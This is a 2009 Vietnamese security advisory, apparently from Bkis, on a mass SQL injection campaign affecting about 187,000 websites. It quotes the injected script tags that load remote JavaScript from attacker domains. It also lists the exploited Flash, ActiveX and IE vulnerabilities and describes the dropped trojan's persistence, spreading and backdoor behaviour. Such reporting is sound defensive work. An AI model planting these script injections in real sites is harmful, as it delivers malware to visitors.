Tháng 12 17 2009

Hơn 187.000 website bị tấn công SQL Injection

Published by admin at 04:05 under Nghiên cứu

Ngày 13/12/2009 một đợt tấn công SQL Injection hàng loạt mới đã được phát hiện. Ở thời điểm cao trào, có tới trên 187.000 website đã bị tấn công.

Ảnh kết quả tìm kiếm google

Các website này có cùng một đặc điểm đó là đều mắc lỗi SQL injection, database đã bị chèn thêm rất nhiều đoạn mã sau: <script src=http://wgwggg.cn:1/1.js></script>

Ảnh viewsource website có mã script

Khi người dùng thăm những website này đoạn script trên sẽ được thực thi và âm thầm tải về  các iframe ẩn chứa mã khai thác, từ đó download malware về máy tính người dùng.

Ảnh 1.js

Biểu đồ tấn công

Trang web sử dụng các mã khai thác của các lỗi:

Lỗ hổng tràn số nguyên trong Adobe Flash Player, được miêu tả trong CVE-2007-0071

Lỗ hổng MDAC ADODB.Connection ActiveX, được mô tả trong MS07-009

Các lỗ hổng Microsoft Office Web Components, được mô tả trong MS09-043

Lỗ hổng Microsoft video ActiveX, được mô tả trong MS09-032

Lỗ hổng Uninitialized Memory Corruption của Internet Explorer, được mô tả trong MS09-002.

Nếu khai thác thành công, file upload.css (W32.CSSExploit.Trojan) sẽ được âm thầm tải và cài đặt vào máy người dùng.

Virus W32.CSSExploit.Trojan có các đặc điểm sau:

  1. 1. Xuất file : %UserProfile%\[RandomName].drv
  2. 2. Copy bản thân thành file có tên “auto.exe” trong thư mục : %ProgramFiles%\Common Files\
  3. 3. Ghi key :

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\auto]

Đăng kí service : DrvKiller

Để virus được chạy lên mỗi khi windows khởi động

  1. 4. Copy bản thân, kèm theo file “autorun.inf” vào tất cả các ổ đĩa để phát tán.
  2. 5. Sửa lại home page thành : http://www.playbo[removed]ing.com.cn:8788/
  3. 6. Cài đặt backdoor, cho phép hacker kiểm soát máy tính từ xa.
  4. 7. Download và thực thi rất nhiều virus game trực tuyến và các loại malware khác trên máy bị lây nhiễm.

Theo kết quả phân tích thì virus và đợt tấn công trên có vẻ như có nguồn gốc từ Trung Quốc.

Chúng tôi vẫn đang tiếp tục theo dõi và phân tích kỹ hơn về cuộc tấn công này.

Khuyến cáo:

-          Hiện nay vẫn còn rất nhiều website bị tấn công chưa được khắc phục, Quản trị của các website này cần nhanh chóng gỡ bỏ tất cả các đoạn script độc hại bị chèn vào database, sửa lại các lỗi SQL Injection của website để đề phòng những đợt tấn công tiếp theo.

-          Người dùng nên cập nhật Windows và bản vá cho các phần mềm. Ngoài ra, nếu đã bị nhiễm virus trên, có thể download Bkav tại đây để diệt.

Theo kết quả phân tích mới nhất của chúng tôi, hacker vừa tiêm một đoạn mã mới vào các website:

<scritp src = http://a.118cc.cn /script>

Bkis Security

No responses yet

Trackback URI | Comments RSS

Leave a Reply